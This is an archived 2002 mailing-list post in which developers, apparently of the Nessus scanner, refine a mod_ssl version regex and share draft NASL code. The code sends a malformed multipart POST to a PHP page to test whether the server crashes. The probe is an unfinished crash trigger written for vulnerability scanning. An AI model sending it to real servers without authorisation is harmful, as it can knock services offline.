On Wednesday 06 March 2002 02:24 am, Renaud Deraison wrote:
> That one was already written by Thomas Reinke (see the plugins page for
> info). I'd be interested in actually testing for the flaw, that'd be
> better and more reliable (my servers have ServerToken = ProductOnly, so
> they would not be tested).

Cool, didn't see it, I usually just check the CVS tree.

> > if( egrep(pattern:"(.*mod_ssl/[1-2].[0-8].[0-6])",string:banner))
>
> Seems wrong to me. It will match on version 1.1.6 but not on 1.9.7.
>
> I think the following would be better :
>
> .*mod_ssl/((1..*)|(2\.([0-7]\.[0-9]*)|(8\.[0-6]))).*

Much better, I knew I sucked at regular expressions.

Here's some code to work with, I will try to finish it up later. The two
sticking points are finding a php page and how long to wait for a response
before determining the server is dead.

# Page to POST to. Finding a php page on the target is still an open
# question, so /index.php is only a guess.
php_page = "/index.php";

boundary1 = string("-NESSUS!");
boundary2 = string("--NESSUS!");
dblq = raw_string(0x22);
badb = raw_string(0x12);

# Build the body first so Content-Length is computed from it instead of
# being a hardcoded number that does not match what is sent.
body = string(boundary2, "\r\n");
body = string(body, "Content-Disposition: form-data; name=");
body = string(body, dblq, badb, dblq);
clen = strlen(body);

# php_page already starts with "/", so it must not be prefixed with another
# one (that produced "POST //index.php" before). HTTP lines end in CRLF.
postdata = string("POST ", php_page, " HTTP/1.0\r\n");
postdata = string(postdata, "Referer: http://", get_host_name(), php_page, "\r\n");
postdata = string(postdata, "Content-type: multipart/form-data; boundary=", boundary1, "\r\n");
postdata = string(postdata, "Content-Length: ", clen, "\r\n\r\n", body);

# Use the web port recorded by find_service, fall back to 80.
port = get_kb_item("Services/www");
if(!port) port = 80;

soc = open_sock_tcp(port);
if(!soc) exit(0);
send(socket:soc, data:postdata);
# How long to wait here before deciding the server is dead is the other
# open question; for now just read whatever comes back.
r = recv(socket:soc, length:512);
close(soc);
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 01:14:04 PST